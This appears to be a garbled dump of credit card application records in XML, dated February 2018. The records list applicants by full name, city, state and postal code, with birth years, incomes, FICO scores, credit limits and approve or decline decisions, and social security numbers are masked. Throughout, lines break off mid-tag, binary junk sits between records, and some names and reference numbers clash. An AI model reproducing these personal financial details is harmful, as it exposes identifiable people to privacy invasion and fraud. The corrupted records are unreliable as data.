mber><applicationId>10000025103853</applicationId><firstName>JASON</firstName><middleInitial></middleInitial><lastName>RAMOS</lastName><addressLine1>          T</addressLine1><addressLine2>          /addressLine2><addressCity>CHICAGO
verageFicoScore></AppData></App>,,•Z+
mber><applicationId>10000025103850</applicationId><firstName>JACQUELINE</firstName><middleInitial></middleInitial><lastName>JOHNSON</lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>GR
'e>526</averageFicoScore></AppData></App>,,•Z8H  B    B
mber><applicationId>10000025103851</applicationId><firstName>CHANY</firstName><middleInitial></middleInitial><lastName>VALDEZ</lastName><addressLine1>          </addressLine1><addressLine2          </addressLine2><address
FicoScore>552</averageFicoScore></AppData></App>,•Z%D
mber><applicationId>10000025103857</applicationId><firstName>BRYAN</firstName><middleInitial>A</middleInitial><lastName>CRUZ</lastName><addressLine1>          /addressLine1><addressLine2></addressLine2><addressCity>LINCOLN PARK</addr
aFicoScore></AppData></App>',•ZR¶| B    B
mber><applicationId>10000025103860</applicationId><firstName>MAY</firstName><middleInitial>K</middleInitial><lastName>MOUA</lastName><addressLine1>          </addressLine1><addressLine2          </addressLine2><addressCity>FAIRFIELD<
verageFicoScore></AppData></App>',•ZÅ• B   B
mber><applicationId>10000025103855</applicationId><firstName>PRAXIDES</firstName><middleInitial></middleInitial><lastName>MEDINA</lastName><addressLine1>          </addressLine1><addressLine2          </addressLine2><addressCity>HYDE PARK<
'averageFicoScore></AppData></App>",•Z¶| B   B
mber><applicationId>10000025103867</applicationId><firstName>MICHAEL</firstName><middleInitial>C</middleInitial><lastName>SPINA</lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>ISLAND PAR
mber><applicationId>10000025103858</applicationId><firstName>ADOLFO</firstName><middleInitial></middleInitial><lastName>GUTIERREZ</lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>CALDWELL</add
erageFicoScore></AppData></App>»,•Z\⬚ B    B
mber><applicationId>10000025103863</applicationId><firstName>JOHNATHAN</firstName><middleInitial>L</middleInitial><lastName>BONANG</lastName><addressLine1>          </addressLine1><addressLine2          </addressLine2><addressCity>EASTON</ad
erageFicoScore></AppData></App>~,•Z;  B    B
mber><applicationId>10000025103862</applicationId><firstName>MICHAEL</firstName><middleInitial></middleInitial><lastName>BEVERLEY</lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>BLUFFTON</a
verageFicoScore></AppData></App>»,•Z+¶   ¶| B
mber><applicationId>10000025103865</applicationId><firstName>ANGELLE</firstName><middleInitial></middleInitial><lastName>MALBROUE</lastName><addressLine1>          </addressLine1><addressLine2   /addressLine2><addressCity>MCCOMB</a
ageFicoScore></AppData></App>»,•Z⬚¶ B   B
mber><applicationId>10000025103866</applicationId><firstName>VICTOR</firstName><middleInitial></middleInitial><lastName>MORENO</lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>HOUSTON</ad
erageFicoScore></AppData></App>$,•ZG¯
mber><applicationId>10000025103869</applicationId><firstName>DALIA</firstName><middleInitial>J</middleInitial><lastName>REYHANA</lastName><addressLine1>          </addressLine1><addressLine2></addressLine2><addressCity>CHICAGO<
'averageFicoScore></AppData></App>œ,•Z>





PNEPTUNE                    CAPSTONE                    00014604912077719            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
ime>11:09:05</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVe
PNEPTUNE                    CAPSTONE                    00014444912435264            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260783</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIn
PNEPTUNE                    CAPSTONE                    00014604912077750            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
11:09:16</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262959</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerifi
PNEPTUNE                    CAPSTONE                    00014444912435272            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
onTime>11:09:18</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identit
PNEPTUNE                    CAPSTONE                    00014444912435280            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
9</decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationI
PNEPTUNE                    CAPSTONE                    00014604912077800            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260778</offerId><approvedCreditLimit>3000</approvedCreditLimit><identityVerificationI
PNEPTUNE                    CAPSTONE                    00014604912077842            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
ionTime>11:09:38</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identi
PNEPTUNE                    CAPSTONE                    00014444912435306            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
<decisionTime>11:09:40</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><
PNEPTUNE                    CAPSTONE                    00014604912077818            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
:09:42</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerifica
PNEPTUNE                    CAPSTONE                    00014604912077859            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
ionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262947</offerId><approvedCreditLimit>1000</approvedCreditLimit><identityVerificationIndicato
PNEPTUNE                    CAPSTONE                    00014604912077842            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
e>11:09:54</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>500</approvedCreditLimit><identityVerif
PNEPTUNE                    CAPSTONE                    00014604912077891            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIn
PNEPTUNE                    CAPSTONE                    00014604912077883            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
:09:55</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerifica
PNEPTUNE                    CAPSTONE                    00014444912435314            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
>11:09:56</decisionTime><decisionResponseCode>APP</decisionResponseCode><decisionResponse>Approve</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260781</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerif

PNEPTUNE                    CAPSTONE                    00014604912077958            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
>11:09:59</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1262946</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerifi
PNEPTUNE                    CAPSTONE                    00014604912077917            CAPSTONE.STREAM.AWS.REQUEST 2018022711090000                        yyyyGMO      目 0目 R
sionTime>11:09:59</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><ident
PNEPTUNE                    CAPSTONE                    00014444912435348            CAPSTONE.STREAM.AWS.REQUEST 2018022711100000                        yyyyGMO      目 0目 R
2</decisionTime><decisionResponseCode>DCL</decisionResponseCode><decisionResponse>Decline</decisionResponse><plasticStyleId>11</plasticStyleId><offerId>1260782</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIn



M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯o ▯o<App><AppData><solicitationReferenceNumber>00014604912077719</s
yleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>95000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicit
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯d ▯d<App><AppData><solicitationReferenceNumber>00014444912435264</s
Id>1260783</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>8000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><avera
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯k ▯k<App><AppData><solicitationReferenceNumber>00014604912077750</s
3<offerId>1262959</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>25000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCo
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯t ▯t<App><AppData><solicitationReferenceNumber>00014444912435272</s
cStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>18000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</soli
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯f ▯f<App><AppData><solicitationReferenceNumber>00014444912435280</s
rId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>95000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><ave
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯u ▯u<App><AppData><solicitationReferenceNumber>00014604912077800</s
Id>1260778</offerId><approvedCreditLimit>3000</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>30000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><ave
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯[ ▯[<App><AppData><solicitationReferenceNumber>00014444912435306</s
icStyleId><offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>25000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</sol
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯k ▯k<App><AppData><solicitationReferenceNumber>00014604912077818</s
/plasticStyleId><offerId>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>44000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>
Id>1260779</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>67000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><aver
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯k ▯k<App><AppData><solicitationReferenceNumber>00014604912077842</s
offerId>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>80000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯_ ▯_<App><AppData><solicitationReferenceNumber>00014604912077842</s
347</offerId><approvedCreditLimit>1000</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>60000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFic
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯o ▯o<App><AppData><solicitationReferenceNumber>00014604912077859</s
aId><offerId>1262953</offerId><approvedCreditLimit>500</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>67000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitied
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯c ▯c<App><AppData><solicitationReferenceNumber>00014604912077819</s
Id>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>40000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><aver
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯k ▯k<App><AppData><solicitationReferenceNumber>00014604912077883</s
<offerId>1262953</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>45000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯n ▯n<App><AppData><solicitationReferenceNumber>00014444912435314</s
N<offerId>1260781</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>43000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedC
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯j ▯j<App><AppData><solicitationReferenceNumber>00014604912077958</s
Id><offerId>1262946</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>1500.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCod
M.AWS.REQUEST 2018022711090000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯t ▯t<App><AppData><solicitationReferenceNumber>00014604912077917</s
ticStyleId><offerId>1262947</offerId><approvedCreditLimit>300</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>35000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</so
M.AWS.REQUEST 2018022711100000                                    ▯    yyyyGMO    ▯ 0▯ ▯▯    CAPSTONE.STREAM.REQUEST                     ▯             ▯b ▯b<App><AppData><solicitationReferenceNumber>00014444912435348</s
rId>1260782</offerId><approvedCreditLimit> 0</approvedCreditLimit><identityVerificationIndicator>N</identityVerificationIndicator><primaryIncome>1900.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><avera

]o  [o<App><AppData><solicitationReferenceNumber>000146049120777719</solicitationReferenceNumber><applicationId>10000025103870</applicationId><firstName>MECHELLE</firstName><middleInitial></middleInitial><lastName>WILLIAMS</lastName><add
primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0</averageFicoScore></AppData></App>j,•Z²€] B  B

]d  [d<App><AppData><solicitationReferenceNumber>000144449124435264</solicitationReferenceNumber><applicationId>10000025103875</applicationId><firstName>MORGAN</firstName><middleInitial>L</middleInitial><lastName>MAGEE</lastName><addres
><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>593</averageFicoScore></AppData></App>§,•Z℣] B  B

]k  [k<App><AppData><solicitationReferenceNumber>000146049120777750</solicitationReferenceNumber><applicationId>10000025103880</applicationId><firstName>SHAUNNEALTOWANS</firstName><middleInitial></middleInitial><lastName>BROWN</lastName
aryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0</averageFicoScore></AppData></App>~,•Z˝] B  B

]t  [t<App><AppData><solicitationReferenceNumber>000144449124435272</solicitationReferenceNumber><applicationId>10000025103881</applicationId><firstName>JACINBY</firstName><middleInitial>L</middleInitial><lastName>ALLEN</lastName><addres
0</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>612</averageFicoScore></AppData></App>®,•Z•1] B  B

]f  [f<App><AppData><solicitationReferenceNumber>000144449124435280</solicitationReferenceNumber><applicationId>10000025103882</applicationId><firstName>SAUNDRA</firstName><middleInitial></middleInitial><lastName>HALL</lastName><address
me><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>555</averageFicoScore></AppData></App>¯,•Zq˝] B  B

]f  [f<App><AppData><solicitationReferenceNumber>000144449124435298</solicitationReferenceNumber><applicationId>10000025103889</applicationId><firstName>LINDSEY</firstName><middleInitial>M</middleInitial><lastName>MAHER</lastName><addres
me><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>671</averageFicoScore></AppData></App>Å,•Z€d] B  B

]u  [u<App><AppData><solicitationReferenceNumber>000146049120777800</solicitationReferenceNumber><applicationId>10000025103896</applicationId><firstName>MARTINE</firstName><middleInitial></middleInitial><lastName>NICOLAS</lastName><addr
00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>549</averageFicoScore></AppData></App>Å,•Z6€] B  B

]I  [I[<App><AppData><solicitationReferenceNumber>000144449124435306</solicitationReferenceNumber><applicationId>10000025103894</applicationId><firstName>DANIELLE</firstName><middleInitial></middleInitial><lastName>MORGAN</lastName><addr
44000.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>629</averageFicoScore></AppData></App>Å,•Z¨.] B  B

]k  [k<App><AppData><solicitationReferenceNumber>000146049120777818</solicitationReferenceNumber><applicationId>10000025103898</applicationId><firstName>MUY</firstName><middleInitial></middleInitial><lastName>LAO</lastName><addressLine1
yIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>630</averageFicoScore></AppData></App>Å,•Z¯™] B  B

]I_  [I_<App><AppData><solicitationReferenceNumber>000146049120777842</solicitationReferenceNumber><applicationId>10000025103903</applicationId><firstName>RHONDA</firstName><middleInitial>S</middleInitial><lastName>LEWIS</lastName><addres
erIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>644</averageFicoScore></AppData></App>Ò,•Z¨8     B  B

]o  [o<App><AppData><solicitationReferenceNumber>000146049120777859</solicitationReferenceNumber><applicationId>10000025103904</applicationId><firstName>TYLER</firstName><middleInitial></middleInitial><lastName>SLAVEN</lastName><addressl
imaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>614</averageFicoScore></AppData></App>Ò,•Z™] B  B

]c  [c<App><AppData><solicitationReferenceNumber>000146049120777891</solicitationReferenceNumber><applicationId>10000025103910</applicationId><firstName>JEREMY</firstName><middleInitial></middleInitial><lastName>PRATHER</lastName><addres
e><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0</averageFicoScore></AppData></App>Ò,•Z§] B  B

]k  [k<App><AppData><solicitationReferenceNumber>000146049120777883</solicitationReferenceNumber><applicationId>10000025103908</applicationId><firstName>TERRI</firstName><middleInitial>L</middleInitial><lastName>STARRETT</lastName><addr
yIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>596</averageFicoScore></AppData></App>Ò,•Z§] B  B

]n  [n<App><AppData><solicitationReferenceNumber>000144449124435314</solicitationReferenceNumber><applicationId>10000025103906</applicationId><firstName>BRETT</firstName><middleInitial>N</middleInitial><lastName>BROADHEAD</lastName><add
maryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>565</averageFicoScore></AppData></App>Ò,•Zçƒ

]j  [j<App><AppData><solicitationReferenceNumber>000146049120777958</solicitationReferenceNumber><applicationId>10000025103923</applicationId><firstName>MURRAY</firstName><middleInitial>P</middleInitial><lastName>ALLISON</lastName><addr
ryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0</averageFicoScore></AppData></App>x,•Z•] B  B

]t  [t<App><AppData><solicitationReferenceNumber>000146049120777917</solicitationReferenceNumber><applicationId>10000025103916</applicationId><firstName>JOSEPH</firstName><middleInitial>R</middleInitial><lastName>HIGGINBOTHAM </lastName
.00</primaryIncome><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0</averageFicoScore></AppData></App>x,•Z1] B  B

]b  [b<App><AppData><solicitationReferenceNumber>000144449124435348</solicitationReferenceNumber><applicationId>10000025103925</applicationId><firstName>SABRINA</firstName><middleInitial>A</middleInitial><lastName>LOFTIN</lastName><addr
><otherIncome>0.00</otherIncome><solicitedCode>N</solicitedCode><averageFicoScore>0</averageFicoScore></AppData></App>Û,•Z1G

:firstName>MECHELLE</firstName><middleInitial></middleInitial><lastName>WILLIAMS</lastName><addressLine1>14900 MEMORIAL DR</addressLine1><addressLine2>       </addressLine2><addressCity>HOUSTON</addressCity><addressState>TX</addressState:
}
:firstName>MORGAN</firstName><middleInitial>L</middleInitial><lastName>MAGEE</lastName><addressLine1         </addressLine1><addressLine2></addressLine2><addressCity>RICHMOND</addressCity><addressState>KY</addressState><addressPost
:firstName>SHAUNNEALTOWAN5</firstName><middleInitial></middleInitial><lastName>BROWN</lastName><addressLine1>        </addressLine1><addressLine2></addressLine2><addressCity>LOS ANGELES</addressCity><addressState>CA</addressState><add
:firstName>JACINBY</firstName><middleInitial>L</middleInitial><lastName>ALLEN</lastName><addressLine1           </addressLine1><addressLine2>     </addressLine2><addressCity>MEMPHIS</addressCity><addressState>TN</addressSta
:firstName>SAUNDRA</firstName><middleInitial></middleInitial><lastName>HALL</lastName><addressLine1          </addressLine1><addressLine2></addressLine2><addressCity>PIKESVILLE</addressCity><addressState>MD</addressState><addressPos
:firstName>LINDSEY</firstName><middleInitial>M</middleInitial><lastName>MAHER</lastName><addressLine1          </addressLine1><addressLine2></addressLine2><addressCity>PENFIELD</addressCity><addressState>NY</addressState><addressPost
:firstName>MARTINE</firstName><middleInitial></middleInitial><lastName>NICOLAS</lastName><addressLine1         </addressLine1><addressLine2        </addressLine2><addressCity>LAUDERDALE LAKES</addressCity><addressState>FL</addressSt
] B   B
:firstName>DANIELLE</firstName><middleInitial></middleInitial><lastName>MORGAN</lastName><addressLine1          </addressLine1><addressLine2           </addressLine2><addressCity>EAST WINDSOR</addressCity><addressState>NJ</add
Ä,•Z”,‼ B   B
:firstName>MUY</firstName><middleInitial></middleInitial><lastName>LAO</lastName><addressLine1          </addressLine1><addressLine2        addressLine2><addressCity>HOUSTON</addressCity><addressState>TX</addressState><addr
:firstName>RHONDA</firstName><middleInitial>S</middleInitial><lastName>LEWIS</lastName><addressLine1         </addressLine1><addressLine2></addressLine2><addressCity>TIFFIN</addressCity><addressState>OH</addressState><addressPostalCode:
:firstName>TYLER</firstName><middleInitial></middleInitial><lastName>SLAVEN</lastName><addressLine1           </addressLine1><addressLine2>     </addressLine2><addressCity>ATLANTA</addressCity><addressState>GA</addressState><a
:firstName>JEREMY</firstName><middleInitial></middleInitial><lastName>PRATHER</lastName><addressLine1        T</addressLine1><addressLine2>    addressLine2><addressCity>SAN JOSE</addressCity><addressState>CA</addressState><addressPost
:firstName>TERRI</firstName><middleInitial>L</middleInitial><lastName>STARRETT</lastName><addressLine1        </addressLine1><addressLine2       </addressLine2><addressCity>HAMPSHIRE</addressCity><addressState>IL</addressState><addre
:firstName>BRETT</firstName><middleInitial>N</middleInitial><lastName>BROADHEAD</lastName><addressLine1         </addressLine1><addressLine2        </addressLine2><addressCity>WICHITA</addressCity><addressState>KS</addressState><ad
:firstName>MURRAY</firstName><middleInitial>P</middleInitial><lastName>ALLISON</lastName><addressLine1          </addressLine1><addressLine2        addressLine2><addressCity>PHILADELPHIA</addressCity><addressState>PA</addressState><ad
:firstName>JOSEPH</firstName><middleInitial>R</middleInitial><lastName>HIGGINBOTHAM </lastName><addressLine1          </addressLine1><addressLine2></addressLine2><addressCity>SAINT PETERSBURG</addressCity><addressState>FL</address:
B   B
:firstName>SABRINA</firstName><middleInitial>A</middleInitial><lastName>LOFTIN</lastName><addressLine1         </addressLine1><addressLine2></addressLine2><addressCity>MEMPHIS</addressCity><addressState>TN</addressState><addressPos

:Line2:░░░░</addressLine2><addressCity>HOUSTON</addressCity><addressState>TX</addressState><addressPostalCode>77079</addressPostalCode><dateOfBirth>1966░░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNum
░</addressLine2><addressCity>RICHMOND</addressCity><addressState>KY</addressState><addressPostalCode>40475</addressPostalCode><dateOfBirth>1998-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber><decisio
.ine2></addressLine2><addressCity>LOS ANGELES</addressCity><addressState>CA</addressState><addressPostalCode>90008</addressPostalCode><dateOfBirth>1996░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber>
ressLine2:░░░░/addressLine2><addressCity>MEMPHIS</addressCity><addressState>TN</addressState><addressPostalCode>38128</addressPostalCode><dateOfBirth>1983-░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurity
:/addressLine2><addressCity>PIKESVILLE</addressCity><addressState>MD</addressState><addressPostalCode>21208</addressPostalCode><dateOfBirth>1960-░░░</dateOfBirth><socialSecurityNumber:░░░░/socialSecurityNumber><decisi
░</addressLine2><addressCity>PENFIELD</addressCity><addressState>NY</addressState><addressPostalCode>14526</addressPostalCode><dateOfBirth>1985░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber><decisio
ne2░░░░</addressLine2><addressCity>LAUDERDALE LAKES</addressCity><addressState>FL</addressState><addressPostalCode>33311</addressPostalCode><dateOfBirth>1979-░░░</dateOfBirth><socialSecurityNumber:░░░░/socialSecurit
.ne2>░░░ ░░:addressLine2><addressCity>EAST WINDSOR</addressCity><addressState>NJ</addressState><addressPostalCode>08512</addressPostalCode><dateOfBirth>1979-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialS
-APT 22D</addressLine2><addressCity>HOUSTON</addressCity><addressState>TX</addressState><addressPostalCode>77057</addressPostalCode><dateOfBirth>1981-░░░</dateOfBirth><socialSecurityNumber:░░░░k</socialSecurityNumber>d
iressLine2><addressCity>TIFFIN</addressCity><addressState>OH</addressState><addressPostalCode>44883</addressPostalCode><dateOfBirth>1964-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber><decisionSystem
ne2>░░░░</addressLine2><addressCity>ATLANTA</addressCity><addressState>GA</addressState><addressPostalCode>30324</addressPostalCode><dateOfBirth>1988-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber>
k</addressLine2><addressCity>SAN JOSE</addressCity><addressState>CA</addressState><addressPostalCode>95116</addressPostalCode><dateOfBirth>1980-░░░</dateOfBirth><socialSecurityNumber:░░░░/socialSecurityNumber><decisio
NIT E</addressLine2><addressCity>HAMPSHIRE</addressCity><addressState>IL</addressState><addressPostalCode>60140</addressPostalCode><dateOfBirth>1971-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber>d
ne2░░░░</addressLine2><addressCity>WICHITA</addressCity><addressState>KS</addressState><addressPostalCode>67210</addressPostalCode><dateOfBirth>1986-░░░</dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber>
>HOME</addressLine2><addressCity>PHILADELPHIA</addressCity><addressState>PA</addressState><addressPostalCode>19139</addressPostalCode><dateOfBirth>1964-░░░/dateOfBirth><socialSecurityNumber:░░░░</socialSecurityNumber
